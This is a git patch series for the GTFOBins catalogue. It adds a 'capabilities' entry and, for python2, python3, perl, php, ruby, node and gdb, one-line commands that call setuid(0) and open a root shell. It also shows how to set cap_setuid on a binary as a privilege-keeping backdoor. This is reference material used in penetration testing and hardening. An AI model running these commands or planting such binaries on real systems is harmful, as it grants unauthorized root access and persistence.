From 1afd9ec9ec9b73ee27726edbd7ab1ddeb17d8742 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 12 Sep 2018 21:29:53 +0100 Subject: [PATCH 1/5] Drafting capabilities --- _data/functions.yml | 7 +++++++ _gtfobins/python2.md | 2 ++ _layouts/bin.html | 4 ++++ 3 files changed, 13 insertions(+) diff --git a/_data/functions.yml b/_data/functions.yml index f9b662f..adc13a1 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -62,6 +62,13 @@ load-library: It loads shared libraries that may be used to run code in the binary execution context. +capabilities-enabled: + label: Capabilities + description: | + It can manipulate its process UID and in Linux systems it can be set with the + `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges. + This also works if the binary is invoked by another binary with the capability set. + suid-enabled: label: SUID description: | diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index d82049c..5f6e73a 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -30,6 +30,8 @@ functions: - code: python2 -c 'open("file_to_read").read()' load-library: - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + capabilities-enabled: + - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")' suid-enabled: - code: ./python2 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: diff --git a/_layouts/bin.html b/_layouts/bin.html index 47e5e30..19b6039 100644 --- a/_layouts/bin.html +++ b/_layouts/bin.html @@ -30,6 +30,10 @@ layout: common cp $(which {{ bin_name }}) . sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}' {% endif %} +{%- if function_name == 'capabilities-enabled' %} +cp $(which {{ bin_name }}) . +sudo setcap cap_setuid+ep {{ bin_name }} +{% endif %} {{ example.code }} {% endcapture %} From e72d7e3d19ab50e2986b6e5f64f5edf14f145044 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 12 Sep 2018 21:56:42 +0100 Subject: [PATCH 2/5] Reorder functions --- _data/functions.yml | 14 +++++++------- _gtfobins/python2.md | 4 ++-- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/_data/functions.yml b/_data/functions.yml index adc13a1..98282a9 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -62,13 +62,6 @@ load-library: It loads shared libraries that may be used to run code in the binary execution context. -capabilities-enabled: - label: Capabilities - description: | - It can manipulate its process UID and in Linux systems it can be set with the - `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges. - This also works if the binary is invoked by another binary with the capability set. - suid-enabled: label: SUID description: | @@ -83,6 +76,13 @@ sudo-enabled: It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on `sudo`. +capabilities-enabled: + label: Capabilities + description: | + It can manipulate its process UID and in Linux systems it can be set with the + `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges. + This also works if the binary is invoked by another binary with the capability set. + suid-limited: label: Limited SUID description: | diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index 5f6e73a..b019cdd 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -30,10 +30,10 @@ functions: - code: python2 -c 'open("file_to_read").read()' load-library: - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - capabilities-enabled: - - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")' suid-enabled: - code: ./python2 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - code: sudo python2 -c 'import os; os.system("/bin/sh")' + capabilities-enabled: + - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")' --- From c7375411b7c601509d15310b83e8086d078604b1 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 12 Sep 2018 21:57:04 +0100 Subject: [PATCH 3/5] Add capabilities to perl, php, python3, and ruby --- _gtfobins/perl.md | 2 ++ _gtfobins/php.md | 4 ++++ _gtfobins/python3.md | 2 ++ _gtfobins/ruby.md | 2 ++ 4 files changed, 10 insertions(+) diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index d3c0e0f..d12e1f8 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -12,4 +12,6 @@ functions: - code: ./perl -e 'exec "/bin/sh";' sudo-enabled: - code: sudo perl -e 'exec "/bin/sh";' + capabilities-enabled: + - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' --- diff --git a/_gtfobins/php.md b/_gtfobins/php.md index 05f41ea..7acdeb1 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -46,4 +46,8 @@ functions: - code: | CMD="/bin/sh" sudo php -r "system('$CMD');" + capabilities-enabled: + - code: | + CMD="/bin/sh" + ./php -r "posix_setuid(0); system('$CMD');" --- diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index d340df1..d71c0a4 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -34,4 +34,6 @@ functions: - code: ./python3 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - code: sudo python3 -c 'import os; os.system("/bin/sh")' + capabilities-enabled: + - code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' --- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index 65c0d3c..1fe9fdb 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -29,4 +29,6 @@ functions: - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' sudo-enabled: - code: sudo ruby -e 'exec "/bin/sh"' + capabilities-enabled: + - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' --- From 73149878009309e723e0dc40340639a7a1662780 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 12 Sep 2018 22:02:05 +0100 Subject: [PATCH 4/5] Add capabilities to node --- _gtfobins/node.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 622f2bf..64c1dd4 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -30,4 +30,7 @@ functions: sudo-enabled: - code: | sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' + capabilities-enabled: + - code: | + ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' --- From aed737131ca63ad6d273ad4918eae78b3775f0ed Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 13 Sep 2018 14:44:59 +0200 Subject: [PATCH 5/5] Add capabilities to gdb --- _gtfobins/gdb.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md index 984d42e..34b1364 100644 --- a/_gtfobins/gdb.md +++ b/_gtfobins/gdb.md @@ -12,4 +12,7 @@ functions: gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit sudo-enabled: - code: sudo gdb -nx -ex '!sh' -ex quit + capabilities-enabled: + - description: Only if it has been compiled with Python support. + code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit ---